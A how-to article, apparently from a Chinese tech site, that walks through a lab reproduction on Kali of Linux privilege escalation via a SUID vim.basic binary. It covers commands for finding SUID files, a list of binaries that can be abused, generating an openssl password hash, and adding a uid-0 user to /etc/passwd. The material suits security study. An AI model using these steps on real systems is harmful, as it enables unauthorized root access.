Linux uses suid vim.basic file to achieve privilege escalation

Linux uses suid vim.basic file to achieve privilege escalation

Reproduce on Kali

First set suid permissions for the required vim.basic file

chmod u+s /usr/bin/vim.basic

First adduser test1 a normal permission user

Now is a suitable environment for privilege escalation

You can find files with suid permissions by using the following command

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

The files that can be used to escalate privileges are

  • nmap
  • vim
  • find
  • bash
  • more
  • less
  • nano
  • cp

The idea of ​​using vim to elevate privileges is to modify the etc/passwd file and add a user with root privileges for yourself

The user format of the passwd file is: username:password:uid:gid:comment:home directory:user's shell

Here you can see the format of the root user

root:x:0:0:root:/root:/bin/bash

(The password part is x because the real password is stored in the /etc/shadow file)

Generate a password: use openssl passwd -1 –salt asd 123 (here is -1 (number 1) not L)

Write it directly in the passwd file.

toor:$1$asd$sTMDZlRI6L.jJEw2I.3x8.:0:0:root:/toor:/bin/bash

You can modify it with vim /etc/passwd, but when saving, E212 will appear, and it cannot be saved, prompting us that we do not have permission to modify this

At this time, you should use the vim.basic file found earlier to run it. This program has suid permissions. Definitely editable

vim.basic /etc/passwd

Use this to open, then modify the file and save it successfully

You can see that it has been added, switch to su toor, password 123, and then check the permissions with id

root permissions

chmod u+s /usr/bin/vim.basic

The above is the full content of this article. I hope it will be helpful for everyone’s study. I also hope that everyone will support 123WORDPRESS.COM.

You may also be interested in:
  • Trash-Cli: Command-line Recycle Bin Tool on Linux
  • 101 scripts to create a Linux recycle bin script
  • Quickly solve the Chinese input method problem under Linux
  • Use MySQL to open/modify port 3306 and open access permissions in Ubuntu/Linux environment
  • Detailed explanation of commands to read and write remote files using Vim in Linux system
  • Solution to Linux server graphics card crash
  • Detailed explanation of the implementation process and usage of the Linux Recycle Bin mechanism

<<:  An article to help you thoroughly understand position calculation in js

>>:  Detailed explanation of MySQL combined index method

Recommend

Tutorial on upgrading from Centos7 to Centos8 (with pictures and text)

If you upgrade in a formal environment, please ba...

A brief discussion on the principle of Vue's two-way event binding v-model

Table of contents explain: Summarize Replenish Un...

Analyze the selection problem of storing time and date types in MySQL

In general applications, we use timestamp, dateti...

Simple steps to implement H5 WeChat public account authorization

Preface Yesterday, there was a project that requi...

Network management and network isolation implementation of Docker containers

1. Docker network management 1. Docker container ...

Detailed steps for configuring Tomcat server in IDEA 2020

The steps for configuring Tomcat in IDEA 2020 are...

How to Rename a Group of Files at Once on Linux

In Linux, we usually use the mv command to rename...

MYSQL performance analyzer EXPLAIN usage example analysis

This article uses an example to illustrate the us...

How to make a centos base image

Preface Now the operating system used by my compa...

Mybatis statistics of the execution time of each SQL statement

background I am often asked about database transa...

JavaScript operation elements teach you how to change the page content style

Table of contents 1. Operation elements 1.1. Chan...

Vue data responsiveness summary

Before talking about data responsiveness, we need...